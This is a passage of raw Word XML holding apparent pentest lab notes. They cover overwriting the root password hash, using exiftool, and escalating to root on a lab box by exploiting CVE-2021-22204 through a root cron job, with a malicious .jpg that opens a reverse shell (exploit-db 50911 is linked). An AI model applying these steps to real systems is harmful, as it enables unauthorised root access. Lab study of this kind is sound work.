        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make a new SHA512 password (do this in your Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="546100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="110" name="image135.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image135.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1030"/>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2EB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mkpasswd -m sha-512 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">newpassword</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EB9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace it with root user's password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EBA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Login as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EBB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EBC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1017"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type in password "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">newpassword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EBD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002E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BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tk70bem81tcg" w:id="415"/>
      <w:bookmarkEnd w:id="415"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exiftool </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To examine photos, we can use:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1349"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exiftool [name of the file]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1349"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And if we are not in the same directory as the photo, we can set the path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EC8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5429250" cy="3352800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="314" name="image304.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image304.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1031"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="54292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2EC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="865"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For example, in the "Precious" Easy HTB, we see that the photo is generated by pdfkit v0.8.6 which had vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ECA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ECB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ECC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xfg4zyatkepr" w:id="416"/>
      <w:bookmarkEnd w:id="416"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exiftool vulnerability and cron job</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ECD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ECE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1032">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Exfiltrated</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, when they ran linPEAS they saw this cronjob:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ECF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1003300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="544" name="image523.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image523.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103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2ED0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/image-exif.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Inside was this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="979"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3276600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="101" name="image93.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image93.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId103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2ED4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="979"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The important lines are:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="979"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMAGES='/var/ww/html/subrion/uploads'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="979"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tells us the path of the images that exiftool is targeting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="979"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exiftool "$IMAGES/$filename" &gt;&gt; $LOGFILE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="979"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This tells us it's targeting files in a specific directory and running the exiftool command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002ED9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EDA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FOR CONTEXT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: We have a low-privilege shell right now and want to priv esc. The cron job is running as root so if we can exploit this we will likely get root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EDB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EDC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exiftool actually has a vulnerability. It's </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CVE-2021-22204</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and I read 3 writeups, all of which gives us root since the cron job is running as root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EDD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId1035">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">first</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup (my favorite) uses an exploit from exploitdb which creates a malicious .jpg file that when run with exiftool will give us a reverse shell. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EDE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Make sure to put the .jpg file in the directory above (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/ww/html/subrion/uploads</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) since that is where the exiftool is targetting files!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EDF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1036">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.exploit-db.com/exploits/50911</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:hyperlink r:id="rId1037">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">second</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">writeup does the same thing as the first but uses a different github exploit, and they upload it through a previous file upload vulnerability, even though they could have just uploaded it using the shell from foothold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002EE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1038">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
